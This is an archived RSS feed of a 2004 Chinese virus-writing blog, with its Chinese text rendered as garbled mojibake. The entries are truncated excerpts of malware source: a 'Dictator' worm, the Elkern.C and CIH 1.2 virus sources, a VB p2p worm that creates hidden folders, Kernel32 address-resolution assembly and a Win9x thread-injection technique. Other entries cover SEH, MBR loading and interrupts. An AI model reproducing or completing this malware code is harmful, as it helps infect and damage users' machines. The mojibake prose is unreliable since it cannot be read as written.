U148 Archive

Markdown archive served by Next.js

Áè³½Èıµã

来源: BlogBus 原始链接: http://blogbus.com:80/blogbus/blog/rdf.php?blogid=5836 存档链接: https://web.archive.org/web/20041129082027id_/http://blogbus.com:80/blogbus/blog/rdf.php?blogid=5836

Áè³½Èıµã http://seath.blogbus.com/ ¼Ç¼һЩ×Ô¼º×ÊÁÏ gb2312 http://www.blogbus.com/ 2004-11-29 16:15 ÎÒĞ´µÄ²¡¶¾ÒßÃç³ÌĞò .386.model flat,stdcalloption casemap:noneinclude \masm32\include\windows.incinclude \masm32\include\kernel32.incinclude \masm32\include\user32.incincludelib \masm32\lib\kernel32.libincludelib \masm32\lib\user32.lib;ÕâÊÇһЩÏà¹ØµÄ¶¨Ò壬;------------------------------------(ÉÏÃæµÄ)--.datamcaption db "ÄãºÃÅóÓÑ!",0mtitle db "±êÌâ..................... http://blogbus.com/blogbus/blog/diary.php?diaryid=65731 seath 2004-01-03T03:32:19+08:00 ÎÒ±àĞ´µÄ²¡¶¾Trojan.Dicta.5632 ÎÒ±àĞ´µÄ²¡¶¾Trojan.Dicta.5632 --------------------------------------------------------------------------------±à¼­:  À´Ô´:EkenChan  Àà±ğ:°²È«Ö®ÄÑ  ÈÕÆÚ:2002.02.18  ½ñÈÕ/×Üä¯ÀÀ: 3/2086  ¡¡¡¡;============= ;INSTRUCTIONS: ;======================= ;WormName: Dictator ;Author:  Eken Chan ;Version:  Alpha 1.0 ;Infect:&nbs..................... http://blogbus.com/blogbus/blog/diary.php?diaryid=65730 seath 2004-01-03T03:31:54+08:00 ¶¯Ì¬µÄ²éÕÒKernel32.dllµÄÄ£¿é¾ä±úÓë GetProcAddressµÄAPIº¯ÊıµØÖ·¡¡¡¡ ;ÊÊÓÃϵͳWin9x/me/2k/xp/ntextrn MessageBoxA: procextrn ExitProcess: procinclude wap32.inc .386.model flat,stdcall .datadb 0.code Start: mov   eax,[esp] ;//È¡Kernel32·µ»ØµØÖ· and   ax,0f000h mov   esi,eax   ;//µÃµ½Kernel.PELoader´úÂëλÖÃ(²»¾«È·)LoopFindKernel32: sub&nbs..................... http://blogbus.com/blogbus/blog/diary.php?diaryid=65729 seath 2004-01-03T03:31:25+08:00 WIN9XÄÚºËÏß³Ì×¢Èë¼°½ø³Ì²»ËÀ¼¼ ÎÒÃÇÖªµÀÔÚNTÄÚºËÏ¿ÉÒÔͨ¹ıCreateRemoteThread²åÈëµ½ÆäËû½ø³ÌµØÖ·¿Õ¼ä£¬ÕâÑù¿ÉÒÔÈÃÎÒÃǵÄÏß³ÌÍÑÀë±¾ÉíµÄ½ø³Ì¶ø´æÔÚ£¬µ«ÔÚWIN9XÏÂÔò²»ĞĞ£¬µ«ÔÚWHGµÄÖйúºÚ¿ÍÖĞÈ´¼ÓÈëÁËWIN9XÄÚºËÏß³Ì×¢Èë¼¼Êõ£¬¿ÉÒÔ½«×Ô¼ºµÄÏß³Ì×¢Èëµ½KERNEL32¡£DLLÖĞ£¬µ«ÔÚËûµÄ´úÂëÖĞÊÇͨ¹ıWinExecÀ´ÊµÏÖ´ÓÆô²¡¶¾½ø³Ì£¬¶øÔÚWIN32ÏÂ×îºÃÊÇͨ¹ıCreateProcessAÀ´ÊµÏÖ£¬¿É¸Ãº¯ÊıÔÚÖ´ĞĞʱ£¬±ØĞëÍùÏàÓ¦µÄÄÚ´æÖĞĞ´ÈëStartInfo £¬ProcessInfo µÈĞÅÏ¢£¬¶..................... http://blogbus.com/blogbus/blog/diary.php?diaryid=65728 seath 2004-01-03T03:30:58+08:00 SEH in ASM Ñо¿ SEH  in ASM Ñо¿By Hume/ÀäÓêÆ®ĞÄ ÎªÊ²Ã´Àϵ÷Öص¯:   SEH³öÏÖÒѾø·ÇÒ»ÈÕ,µ«ºÜ¶àÈË¿ÉÄÜ»¹²»³¹µ×Á˽âSehµÄÔËĞĞ»úÖÆ;ÓйØsehµÄ֪ʶ×ÊÁϲ»ÊǺܶà,asm¼¶µÄÏêϸ×ÊÁϾ͸üÉÙ!seh²»½ö¿ÉÒÔ¼ò»¯³ÌĞò´íÎó´¦Àí,ʹÄãµÄ³ÌĞò¸ü¼Ó½¡×³,»¹±»¹ã·ºÓ¦ÓÃÓÚ·´¸ú×ÙÒÔ¼°¼Ó½âÃÜÖĞ,Òò´Ë,Á˽âseh·Ç³£±ØÒª,µ«Òź¶µÄÊǹØÓÚsehÏêϸ½éÉܵÄÖĞÎÄ×ÊÁϷdz£ÉÙ,ÔÚʵ¼ùµÄ»ù´¡ÉÏ,°Ñ×Ô¼ºÑ§Ï°µÄÒ»µã±Ê¼Ç·îÏ׸ø´ó¼Ò,Ï£Íû¶Ôϲ»¶ASMµÄÅóÓ..................... http://blogbus.com/blogbus/blog/diary.php?diaryid=65727 seath 2004-01-03T03:30:31+08:00 p2pÈä³æµÄ´úÂë Sub fORM_lOAD()If App.PrevInstance = True Then    EndEnd If    Set fso = CreateObject("Scripting.FileSystemObject")    Set windir = fso.GetSpecialFolder(0)    If (Not (fso.FolderExists(windir & "" & "fonts^-^"))) Then        fso.CreateFolder windir & ..................... http://blogbus.com/blogbus/blog/diary.php?diaryid=65726 seath 2004-01-03T03:30:06+08:00 Elkern.CÔ´´úÂë .386.model flat include win32.incincludelib import32.libextrn MessageBoxA: procextrn ExitProcess: procextrn CreateProcessA: proc DEBUG equ 1 if DEBUGinclude debug.asmendif FMAP_NAME equ 'Wqk',0MUTEX_NAME equ 'Oux',0 INFPROC_PROT_SIZE equ (41024)INFPROC_MAP_SIZE equ (161024)INF_SIGN equ 'QW'MEM_INF_SIGN e..................... http://blogbus.com/blogbus/blog/diary.php?diaryid=65725 seath 2004-01-03T03:29:35+08:00 CIH1.2ÍêÈ«Ô´³ÌĞò CIH v1.2Ô´³ÌĞò      **************************************************************************** ; * The Virus Program Information * ; **************************************************************************** ; * Designer : CIH Original Place : TTIT of Taiwan * ; * Create Date : 04/26/1998 Now Version : 1.2 * ; * Modification Time : 05/2..................... http://blogbus.com/blogbus/blog/diary.php?diaryid=65724 seath 2004-01-03T03:29:03+08:00 MBR¼ÓÔعı³Ì Èç¹û´ÓÈíÅÌÆğ¶¯,ÔòDosÒıµ¼³ÌĞò±»ROM BIOSÖ±½Ó¼ÓÔص½ÄÚ´æ,Èô´ÓÓ²ÅÌÆğ¶¯,Ôò±»Ó²ÅÌµÄ Ö÷Òıµ¼³ÌĞò¼ÓÔØ.²»¹ı¶¼ÊDZ»¼ÓÔص½ÄÚ´æµÄ¾ø¶ÔµØÖ·0000:7C00H´¦.Òò´Ë,DosÒıµ¼³ÌĞòµÄµÚÒ»ÌõÖ¸ÁîµÄµØÖ·Ò»¶¨ÊÇ0000:7C00H. DosÒıµ¼³ÌĞòËù×öµÄÊÂÇéÈçÏÂ: 1>µ÷Õû¶ÑջλÖà 2>ĞŞ¸Ä²¢ÓÃĞŞ¸ÄºóµÄ´ÅÅ̲ÎÊı±íÀ´¸´Î»´ÅÅÌϵͳ 3>¼ÆËã¸ùĿ¼±íµÄÊ×ÉÈÇøµÄλÖü°IO.SYSµÄÉÈÇøλÖà 4>¶ÁÈë¸ùĿ¼±íµÄÊ×ÉÈÇø 5>¼ì²é¸..................... http://blogbus.com/blogbus/blog/diary.php?diaryid=65723 seath 2004-01-03T03:28:06+08:00 ÖжϷ¢Éúʱºò ÖжϷ¢Éúʱºò,CPU×Ô¶¯µ÷ÓÃÏàÓ¦µÄÖжϴ¦Àí³ÌĞò,ÕâĞ©Öжϴ¦Àí³ÌĞòµÄÈë¿ÚÖ¸Õë(±»³Æ×÷ÖжÏÏòÁ¿)Ò»°ã±»·ÅÔÚÒ»¸öÖ¸¶¨µÄλÖÃ,±ÈÈçBIOSÖжÏÏòÁ¿·ÅÔÚµØÖ·0-1KµÄ¿Õ¼äÄÚ,ÿ4¸ö×Ö½Ú´æ·ÅÒ»¸öÖжÏÏòÁ¿.¶øÔÚ±£»¤Ä£Ê½ÏÂ,BIOSÖжϲ»¿ÉÓÃ,ÖжÏÏòÁ¿±»·ÅÔÚIDTÖĞ,µ±Ò»¸öÖжϷ¢Éúʱ,CPU½«ÖжϺÅ×÷ΪË÷Òıµ½ÏàÓ¦µÄÖжϴ¦Àí³ÌĞò±íÖĞ(BIOSÖжÏÏòÁ¿±í(ʵģʽ)»òIDT(±£»¤Ä£Ê½))ÕÒµ½ÏàÓ¦µÄÖжϴ¦Àí³ÌĞòµÄÖ¸Õë,²¢Ö´ĞĞËü. ÁíÍâ,Öжϴ¦Àí³ÌĞòÓÃC/C++»¹Ê..................... http://blogbus.com/blogbus/blog/diary.php?diaryid=65722 seath 2004-01-03T03:27:43+08:00